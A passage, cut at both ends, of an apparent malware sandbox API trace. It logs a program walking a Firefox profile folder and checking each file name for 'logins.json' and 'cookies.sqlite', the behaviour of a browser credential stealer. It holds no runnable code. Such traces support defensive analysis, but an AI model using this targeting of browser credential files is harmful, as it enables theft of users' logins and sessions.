lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.155] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.155] lstrlenW (lpString="mimeTypes.rdf") returned 13 [0161.155] GetProcessHeap () returned 0x8e0000 [0161.155] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fce90 [0161.155] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.155] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="mimeTypes.rdf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf" [0161.155] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.155] GetProcessHeap () returned 0x8e0000 [0161.155] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.155] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf", lpSrch="logins.json") returned 0x0 [0161.155] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf", lpSrch="cookies.sqlite") returned 0x0 [0161.155] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.155] GetProcessHeap () returned 0x8e0000 [0161.155] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.155] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="minidumps", cAlternateFileName="MINIDU~1")) returned 1 [0161.155] lstrcmpiW (lpString1="minidumps", lpString2=".") returned 1 [0161.155] lstrcmpiW (lpString1="minidumps", lpString2="..") returned 1 [0161.155] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.155] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.155] lstrlenW (lpString="\\") returned 1 [0161.155] GetProcessHeap () returned 0x8e0000 [0161.155] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.155] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.155] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.155] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.155] lstrlenW (lpString="minidumps") returned 9 [0161.155] GetProcessHeap () returned 0x8e0000 [0161.155] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x924a48 [0161.155] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.155] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="minidumps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0161.155] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.155] GetProcessHeap () returned 0x8e0000 [0161.155] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.156] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned 97 [0161.156] lstrlenW (lpString="") returned 0 [0161.156] GetProcessHeap () returned 0x8e0000 [0161.156] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x924b18 [0161.156] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0161.156] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0161.156] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned 97 [0161.156] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned 97 [0161.156] lstrlenW (lpString="\\*.*") returned 4 [0161.156] GetProcessHeap () returned 0x8e0000 [0161.156] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fce90 [0161.156] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0161.156] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*.*" [0161.156] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*.*", lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54, dwReserved1=0x54, cFileName=".", cAlternateFileName="")) returned 0x8f9a80 [0161.156] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.156] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54, dwReserved1=0x54, cFileName="..", cAlternateFileName="")) returned 1 [0161.156] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.156] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.156] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54, dwReserved1=0x54, cFileName="..", cAlternateFileName="")) returned 0 [0161.156] FindClose (in: hFindFile=0x8f9a80 | out: hFindFile=0x8f9a80) returned 1 [0161.156] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df4ec, dwLength=0x1c | out: lpBuffer=0x2df4ec*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.156] GetProcessHeap () returned 0x8e0000 [0161.156] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.156] VirtualQuery (in: lpAddress=0x924b18, lpBuffer=0x2df4ec, dwLength=0x1c | out: lpBuffer=0x2df4ec*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.156] GetProcessHeap () returned 0x8e0000 [0161.157] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924b18 | out: hHeap=0x8e0000) returned 1 [0161.157] VirtualQuery (in: lpAddress=0x924a48, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.157] GetProcessHeap () returned 0x8e0000 [0161.157] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a48 | out: hHeap=0x8e0000) returned 1 [0161.157] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.157] lstrlenW (lpString="\\") returned 1 [0161.157] GetProcessHeap () returned 0x8e0000 [0161.157] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.157] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.157] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.157] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.157] lstrlenW (lpString="minidumps") returned 9 [0161.157] GetProcessHeap () returned 0x8e0000 [0161.157] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x924a48 [0161.157] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.157] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="minidumps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0161.157] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.157] GetProcessHeap () returned 0x8e0000 [0161.157] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.157] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps", lpSrch="logins.json") returned 0x0 [0161.157] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps", lpSrch="cookies.sqlite") returned 0x0 [0161.157] VirtualQuery (in: lpAddress=0x924a48, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.157] GetProcessHeap () returned 0x8e0000 [0161.157] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a48 | out: hHeap=0x8e0000) returned 1 [0161.157] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x80696ec0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="parent.lock", cAlternateFileName="PARENT~1.LOC")) returned 1 [0161.157] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.157] lstrlenW (lpString="\\") returned 1 [0161.157] GetProcessHeap () returned 0x8e0000 [0161.157] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.157] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.157] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.157] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.157] lstrlenW (lpString="parent.lock") returned 11 [0161.158] GetProcessHeap () returned 0x8e0000 [0161.158] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc8) returned 0x924a48 [0161.158] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.158] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="parent.lock" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock" [0161.158] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.158] GetProcessHeap () returned 0x8e0000 [0161.158] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.158] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock", lpSrch="logins.json") returned 0x0 [0161.158] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock", lpSrch="cookies.sqlite") returned 0x0 [0161.158] VirtualQuery (in: lpAddress=0x924a48, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.158] GetProcessHeap () returned 0x8e0000 [0161.158] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a48 | out: hHeap=0x8e0000) returned 1 [0161.158] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb43eb830, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb43eb830, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc3b3f6e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="permissions.sqlite", cAlternateFileName="PERMIS~1.SQL")) returned 1 [0161.158] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.158] lstrlenW (lpString="\\") returned 1 [0161.158] GetProcessHeap () returned 0x8e0000 [0161.158] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.158] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.158] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.158] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.158] lstrlenW (lpString="permissions.sqlite") returned 18 [0161.158] GetProcessHeap () returned 0x8e0000 [0161.158] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd6) returned 0x924a48 [0161.158] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.158] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="permissions.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" [0161.158] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.158] GetProcessHeap () returned 0x8e0000 [0161.158] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.158] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite", lpSrch="logins.json") returned 0x0 [0161.158] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.158] VirtualQuery (in: lpAddress=0x924a48, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.158] GetProcessHeap () returned 0x8e0000 [0161.158] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a48 | out: hHeap=0x8e0000) returned 1 [0161.158] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4c1a3d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb4c1a3d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x82b58970, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xa00000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="places.sqlite", cAlternateFileName="PLACES~1.SQL")) returned 1 [0161.159] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.159] lstrlenW (lpString="\\") returned 1 [0161.159] GetProcessHeap () returned 0x8e0000 [0161.159] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.159] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.159] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.159] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS 